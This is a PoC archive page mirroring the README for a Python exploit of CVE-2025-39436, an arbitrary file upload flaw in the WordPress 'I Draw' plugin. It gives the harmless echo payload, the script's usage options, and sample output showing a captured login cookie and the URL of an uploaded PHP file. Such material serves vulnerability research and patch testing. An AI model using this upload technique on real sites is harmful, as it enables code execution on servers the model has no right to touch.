Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-39436 PoC — WordPress plugin I Draw 代码问题漏洞

Source
Associated Vulnerability
Title:WordPress plugin I Draw 代码问题漏洞 (CVE-2025-39436)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin I Draw 1.0及之前版本存在代码问题漏洞,该漏洞源于允许上传危险类型文件,可能导致使用恶意文件。
Description
 WordPress I Draw Plugin <= 1.0 is vulnerable to Arbitrary File Upload 
Readme
# 🚨 WordPress Plugin Exploit: CVE-2025-39436

## 📝 Description
An **Unrestricted Upload of File with Dangerous Type** vulnerability exists in the "I Draw" WordPress plugin. This exploit allows attackers to upload malicious files without restriction. The issue impacts **I Draw versions up to 1.0**.

---

## 🛠️ Exploit Details
The exploit leverages the plugin's file upload functionality to execute a PHP payload. Below is the default payload used:

```php
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
```

---

## 🚀 Usage
```bash
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target website URL
  -un, --username USERNAME
                        Username
  -p, --password PASSWORD
```

---

## 💻 Script Output Example
```plaintext
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php
```

---

## ⚠️ Disclaimer
This script is provided for **educational purposes only**. The author takes no responsibility for any misuse or damage caused by this exploit. Use it at your own risk.

---

*By: Nxploited ( Khaled Alenazi )*
File Snapshot

[4.0K] /data/pocs/7f16eda47cd884489fbf69196bce6110989e961e ├── [1.9K] CVE-2025-39436.py ├── [1.1K] LICENSE ├── [1.4K] README.md └── [ 9] requirements.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.